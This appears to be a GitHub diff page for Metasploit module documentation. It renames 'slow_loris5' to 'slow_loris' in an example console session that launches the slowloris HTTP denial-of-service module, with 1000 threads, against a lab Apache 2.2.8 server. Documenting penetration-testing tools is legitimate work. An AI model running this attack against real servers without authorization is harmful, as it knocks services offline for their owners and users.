File tree Expand file tree Collapse file tree 1 file changed +5
-5
lines changed
documentation/modules/auxiliary/dos/http Expand file tree Collapse file tree 1 file changed +5
-5
lines changed Original file line number Diff line number Diff line change @@ -22,10 +22,10 @@ Vulnerable app versions include:
22
22
### Apache/2.2.8 - Ubuntu 8.04
23
23
24
24
```
25
- msf > use auxiliary/dos/http/slow_loris5
26
- msf auxiliary(slow_loris5 ) > show options
25
+ msf > use auxiliary/dos/http/slow_loris
26
+ msf auxiliary(slow_loris ) > show options
27
27
28
- Module options (auxiliary/dos/http/slow_loris5 ):
28
+ Module options (auxiliary/dos/http/slow_loris ):
29
29
30
30
Name Current Setting Required Description
31
31
---- --------------- -------- -----------
@@ -34,9 +34,9 @@ Module options (auxiliary/dos/http/slow_loris5):
34
34
RPORT 80 yes The target port (TCP)
35
35
THREADS 1000 yes The number of concurrent threads
36
36
37
- msf auxiliary(slow_loris5 ) > set RHOST 192.168.216.129
37
+ msf auxiliary(slow_loris ) > set RHOST 192.168.216.129
38
38
RHOST => 192.168.216.129
39
- msf auxiliary(slow_loris5 ) > run
39
+ msf auxiliary(slow_loris ) > run
40
40
41
41
[*] 192.168.216.129:80 - Executing requests 1 - 1000...
42
42
You can’t perform that action at this time.
0 commit comments